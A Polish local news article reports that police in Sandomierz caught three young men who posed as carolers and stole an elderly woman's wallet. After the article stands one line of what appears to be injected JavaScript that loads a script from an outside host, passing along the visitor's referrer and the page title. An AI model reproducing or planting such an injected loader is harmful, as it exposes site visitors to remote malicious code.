Kronika Policyjna

Kolędy śpiewali i … portfel zabrali

Kolędy śpiewali i … portfel zabrali

Policjanci z Komendy Powiatowej Policji w Sandomierzu zatrzymali trzech mężczyzn, którzy w przebraniu kolędników odwiedzali mieszkańców miasta. W jednym z domów wykorzystując nieuwagę 74-letniej kobiety dokonali kradzieży portfela. Policjanci sprawdzają czy kolędnicy nie mają na sumieniu jeszcze innych kradzieży.

W środę wieczorem oficer dyżurny sandomierskiej komendy otrzymał zgłoszenie o kradzieży portfela z domu jednej z mieszkanek Sandomierza. 46-letnia kobieta relacjonując całe zdarzenie poinformowała, że podczas jej chwilowej nieobecności trzech mężczyzn przebranych za kolędników zapukało do drzwi jej domu, w którym przebywała jej 74-letnia matka. Po złożeniu świątecznych życzeń ,,artyści’’ otrzymali od kobiety symboliczne 5 złotych i powędrowali dalej. Zgłaszająca po powrocie dowiedziała się o świątecznych odwiedzinach i zauważyła, że z torebki znajdującej się w pomieszczeniu gdzie gościli kolędnicy zniknął portfel z dokumentami, kartą płatniczą i pieniędzmi w kwocie 45 zł. Jak się później okazało przebierańcy po opuszczeniu mieszkania usiłowali także dokonać wypłaty pieniędzy w bankomacie za pomocą karty płatniczej, znajdującej się w skradzionym portfelu. Jednak gotówki nie uzyskali z uwagi na brak środków na koncie.

Policjanci z Wydziału Kryminalnego rozpoczęli przeglądanie wszelkich możliwych zapisów z monitoringów miejskich, zakładowych oraz prywatnych szukając jakiegokolwiek śladu pozostawionego przez sprawców. Udali się również w rejon bankomatu z którego, sprawcy podejmowali próbę wypłaty pieniędzy. Szybka reakcja, skrupulatna praca i informacje zebrane przez funkcjonariuszy, doprowadziły ich do sąsiedniej miejscowości, a dokładnie do miejsca zamieszkania jednego z przebierańców, którym okazał się 16-latek przebrany w chwili kolędowania za króla. Następnie policjanci zatrzymali dwóch pozostałych kolędników.

W konsekwencji stróże prawa zatrzymali trzech sprawców, odzyskali portfel z dokumentami jednak pieniądze ,,fałszywi kolędnicy’’ wydali tuż po zakończonych występach. Zatrzymani mieszkańcy Podkarpacia w wieku od 16, 18 i 21 lat za swoje nieprzemyślane zachowanie odpowiedzą teraz przed Sądem.

Kolędnicy są miłym dodatkiem do świąt, policjanci przypominają jednak o zachowaniu szczególnej ostrożności w przypadku wizyty obcych osób w mieszkaniu, niezależnie czy będzie to inkasent, kolędnik, czy też osoba podająca się za pracownika innej instytucji.

źródło: KWP Kielce

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Zobacz Komentarze (1)

1 Komentarz

Zostaw komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

Kronika Policyjna

Więcej w Kronika Policyjna

Egzaminy na kartę rowerową przed wakacjami – zaliczone

tsa24.com15 czerwca 2021

Nielegalne automaty na terenie Sandomierza zlikwidowane

tsa24.com14 czerwca 2021

Policyjny pościg za motocyklem zakończony w celi

tsa24.com8 czerwca 2021

Uwaga kierowcy droga zablokowana !

tsa24.com7 czerwca 2021

Policjantka po służbie zatrzymała sklepowego złodzieja

tsa24.com7 czerwca 2021

Charytatywny piknik w Łoniowie

tsa24.com7 czerwca 2021

Podrobiona odzież na sandomierskim targowisku zabezpieczona

tsa24.com7 czerwca 2021

Odpowie za kradzież telefonu

tsa24.com31 maja 2021

Nietrzeźwy kierowca opla jechał ścieżką dla rowerów

tsa24.com25 maja 2021